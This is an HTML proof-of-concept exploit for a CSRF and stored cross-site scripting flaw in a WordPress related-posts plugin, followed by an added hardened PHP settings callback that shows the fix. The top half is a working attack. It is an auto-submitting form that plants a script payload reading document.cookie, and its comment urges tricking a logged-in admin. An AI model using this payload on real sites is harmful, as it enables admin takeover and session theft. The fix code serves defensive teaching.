<html>
<head>
<title>woprdress</title>
<!--
wordpress-23-related-posts-plugin 1.2 csrf/xss/script insertion security bug
by: marty_the_dns_guru
http://wordpress.org/extend/plugins/wordpress-23-related-posts-plugin/
trick the wordpress admin into visiting this page while logged in, and ..
_hostile take-over_!
-->
</head>
<body onload="document.forms['form1'].submit();">
<form method="post" action="http://[host]/wp-admin/options-general.php?page=wp_related_posts.php" id="form1">
<input type="hidden" name="wp_rp_title_option" value=""><script>alert(/enemy missile!enemy missile!/ + document.cookie);</script>">
<input type="hidden" name="wp_rp_Submit" value="Save changes">
</form>
</body>
</html>
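The form above works because the settings handler accepts a cross-site POST with no per-user token and later prints the saved value unescaped. The following is an added example, not the plugin's code and not part of the original paste, of a WordPress settings callback that closes both gaps. The function name, the nonce action and nonce field name, and the stored option key are hypothetical; only the field names wp_rp_title_option and wp_rp_Submit come from the form above.

```php
<?php
// Added example: hypothetical hardened settings page for the two fields
// seen in the form above. Runs inside WordPress as an admin page callback.
function example_wp_rp_options_page() {
    // Authorization: only administrators may view or change these settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }

    if ( isset( $_POST['wp_rp_Submit'] ) ) {
        // CSRF check: aborts the request unless the POST carries a nonce
        // minted for this user and this action. A third-party page that
        // auto-submits a form cannot supply it.
        check_admin_referer( 'example_wp_rp_save', 'example_wp_rp_nonce' );

        // Input filtering: strip tags and control characters before storing.
        $title = isset( $_POST['wp_rp_title_option'] )
            ? sanitize_text_field( wp_unslash( $_POST['wp_rp_title_option'] ) )
            : '';
        // Option key is an assumption; the paste only shows the POST field.
        update_option( 'wp_rp_title_option', $title );
    }

    $title = get_option( 'wp_rp_title_option', '' );
    ?>
    <form method="post" action="">
        <?php wp_nonce_field( 'example_wp_rp_save', 'example_wp_rp_nonce' ); ?>
        <!-- Output escaping: esc_attr() keeps a stored quote or angle
             bracket from closing the value attribute. -->
        <input type="text" name="wp_rp_title_option"
               value="<?php echo esc_attr( $title ); ?>">
        <input type="submit" name="wp_rp_Submit" value="Save changes">
    </form>
    <?php
}
```

Any other template that prints the saved title needs the same output escaping (esc_html() in element content, esc_attr() in attributes), since values stored before the fix may already contain markup.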